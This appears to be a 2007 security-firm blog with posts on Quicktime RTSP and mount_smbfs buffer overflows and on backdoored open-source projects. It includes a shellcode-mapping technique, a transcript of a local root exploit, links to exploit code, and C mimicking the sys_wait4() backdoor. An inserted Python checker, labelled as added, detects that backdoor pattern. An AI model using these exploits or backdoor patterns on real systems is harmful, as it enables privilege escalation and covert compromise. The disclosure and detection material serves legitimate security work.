QA Hell: Quicktime again!

Even if time for keeping this blog updated is becoming rather scarce, we couldn’t resist publishing a note about Quicktime again. It was in the news some time ago, due to another simple, classical stack buffer overflow flaw, again related to the RTSP interfaces.

Our exploit pack already provides a reliable exploit against this and other recent flaws, and there’s no real exploit for this flaw publicly available (in terms of quality and reliability). It’s quite possible that so-called drive-by malware installation kits are making use of this flaw to infect unsuspecting users.

We expected Apple to perform some due diligence on Quicktime’s QA, since the last real 1990s-style flaws have all been related to RTSP functionality, but it looks like they are still missing some guidance. Hopefully it won’t take long for them to realize that something like the SDL could significantly improve their product security.

Our last public (Apple Mac OS X) exploit of the year: mount_smbfs

We are happy to announce the availability of a 100% reliable exploit against CVE-2007-3876, the mount_smbfs argument stack-based buffer overflow. Using the shared_region_map_file_np() system call, we map a file containing shellcode at a fixed location, with write, read and execute permissions (VM_PROT_EXECUTE|VM_PROT_READ|VM_PROT_WRITE). This technique was first documented publicly in a Phrack article by nemo, and has been partially restricted in Leopard.
On an unpatched Mac OS X 10.4 installation (that is, one without the update fixing this problem) it will allow any user to gain root privileges.

$ ./mount_smbfs_root
Mac OS X 10.4.10, 10.4.11 mount_smbfs Local Root exploit
Copyright (c) 2007-2008 Subreption LLC. All rights reserved.
Mapping shellcode from file via shared_region_map_file_np()...
Shellcode mapped: mapping starts at 0x9ffff000, shellcode at 9fffff71
Payload size: 1064 (1040 padding bytes), Return address: 0x9fffff71
mount_smbfs: workgroup name 'AAAA...'
malcomx:/Users/nonpriv root# id
uid=0(root) gid=501(nonpriv) groups=501(nonpriv), 81(appserveradm), 79(appserverusr), 80(admin)
malcomx:/Users/nonpriv root# exit
exit

It is available at our corporate public repository, as well as the Milw0rm website.

Starting January 2008, our focus will be on developing and polishing a commercial exploit code and penetration-testing toolset, comprising several reliable exploits and tools to aid security professionals in penetration tests and IDS and HIPS developers, as well as serving as an educational resource on exploit techniques, IDS evasion and general information security for the Mac OS X, Solaris, Linux and Microsoft Windows platforms, from a strictly technical perspective.

We are interested in partnerships with prospective security vendors and especially companies with a strong focus on research and a consistent record of developing innovative, technically complex security work. For more information, you can contact us at Our sales email address. We will carefully examine all offers on a case-by-case basis.

Open source projects, compromised

Every now and then the news reports that some Open Source software package has been compromised (that is, backdoored: tampered with to include code or functionality that exposes its users to abuse by third parties). A few days ago it was SquirrelMail; in March it was the massively extended WordPress blogging software.

In 2003, the Linux kernel itself experienced a compromise that resulted in a very subtle, discreet backdoor being added to the source code of the sys_wait4() function, which allowed local privilege escalation to root. Debian, GNU Project and Gentoo servers and distribution sites have been targets of successful attacks, and the CVS project server was attacked in 2004. Recently, Ubuntu community-hosted servers were compromised as well.

In 2002, IRSSI (the IRC client) and several network security tools hosted at Monkey.org were modified to contain backdoors that activated at compile time.

All your base are belong to us.

Some languages are more prone to subtle manipulation for implementing hostile functionality: in C, conditional statements, variable assignment and incorrect use of operators; in PHP, the preg_replace function and other possibilities. Some object-oriented languages, such as Objective-C, also allow class methods and functions to be intercepted easily.

In the Linux kernel case, the change could easily have been passed off as a typo. The fact that there are sophisticated attackers out there, who inspect and dive into the target before making the definitive move, is certainly not a common threat. In the words of BitMover founder Larry McVoy (in an article for SecurityFocus):

“Whoever did this knew what they were doing. They had to find some flags that could be passed to the system without causing an error, and yet are not normally passed together… There isn’t any way that somebody could casually come in, not know about UNIX, not know the Linux kernel code, and make this change. Not a chance.”
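As an added illustration (not code from the original post or from Subreption), the following script is a crude static check for the C "assignment in a conditional" pattern mentioned above, the shape the sys_wait4() backdoor took: it flags every if/while condition containing a bare "=" that is not part of a comparison operator. The C source it scans is constructed to mirror that shape; the function and identifier names in it are made up. The legitimate while-assignment idiom is reported too, deliberately: wrapping an assignment in its own parentheses is exactly what silences a compiler's -Wparentheses warning, so a reviewer has to look at every hit rather than trust the compiler.

```python
import re

# Constructed sample C source for the check to run over. The first `if` mirrors
# the shape of the 2003 sys_wait4() backdoor (a single "=" where "==" was expected).
SAMPLE_C = """\
int wait4_like(int options, int uid)
{
    int retval = 0;
    if ((options == (WCLONE|WALL)) && (uid = 0))
        retval = -1;
    if (retval != 0 && uid >= 0)
        return retval;
    while ((retval = next_value()) != 0)
        ;
    return retval;
}
"""

# Two-character operators that contain "=" but are comparisons, not assignments.
COMPARISON_OPS = re.compile(r"==|!=|<=|>=")


def _condition(line, keyword):
    """Return the text inside the balanced parentheses after `keyword`, or None."""
    m = re.search(r"\b%s\s*\(" % keyword, line)
    if not m:
        return None
    depth, start = 0, m.end() - 1
    for i in range(start, len(line)):
        if line[i] == "(":
            depth += 1
        elif line[i] == ")":
            depth -= 1
            if depth == 0:
                return line[start + 1:i]
    return None


def find_assignments_in_conditions(source):
    """Report (line number, condition) for every single-line if/while condition
    that still contains "=" once the comparison operators are removed."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for kw in ("if", "while"):
            cond = _condition(line, kw)
            if cond is None:
                continue
            if "=" in COMPARISON_OPS.sub("", cond):
                hits.append((lineno, cond.strip()))
    return hits
```

Running find_assignments_in_conditions(SAMPLE_C) reports lines 4 and 8; only a human reading line 4 can tell that the parenthesised (uid = 0) is hostile rather than idiomatic.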

The security industry itself is normally driven by trends, and nowadays the trend is about defacements, unsophisticated attacks and propaganda tools. The real threats aren’t botnets or Brazilian defacement script-kiddies.

One of the main disadvantages that affect open source projects is the fact that their development resources are far more exposed than those of proprietary vendors. It’s easy to audit the software powering their version-controlled repository, their issue and bug tracking application, their mail server daemon (hopefully it’s Qmail!), etc. While closed source applications are also exposed in other manners, an open source project depends entirely on an open development model, which has its own (security) weaknesses.

There’s no real way to enforce legal obligations and rights for each developer (the insider threat: a rogue developer adding a backdoor himself) without putting agreements and other paperwork in place.

Quicktime RTSP Redux released

While we wouldn’t release exploit code under normal circumstances, we are still an emerging company and wanted to show an example of our work. Since this vulnerability was already public, and the Apple security people are most probably working on an imminent update to Quicktime, potential attackers have a limited time-span to abuse it.

Hopefully Apple will speed up on this one and release an update to fix the vulnerability. We enjoy the versatility of Mac OS X on a daily basis, and want it to be as secure as possible.

Thanks to Kevin Finisterre for the testing environment and proofing of the exploit on PowerPC. Thanks to HD Moore for suggestions and the Metasploit project.

The exploit code is available at: static.subreption.com/public/exploits/qtimertsp_redux.rb

Some improvements that might be released:

  • Better PowerPC target information.
  • Reliable Microsoft Windows Vista target.
  • Reliable Leopard target for x86.


Finally, we are up and running!

Finally we decided that Mephisto wasn’t yet the right solution for us, and until we have time to put a proper blog engine in place, we are going to keep this going. We are damn busy at the moment, which is why our time for blogging is really limited. But we’ll try to keep interesting news around, stay tuned :-) .

We are sorry about the not-so-impressive-looking current design, but this is being worked on behind the scenes. Hopefully the design guy will come up with some fresh ideas; he’s still busy working on the corporate site. Although, developing with Rails is never boring (well, just unlikely ;-) ).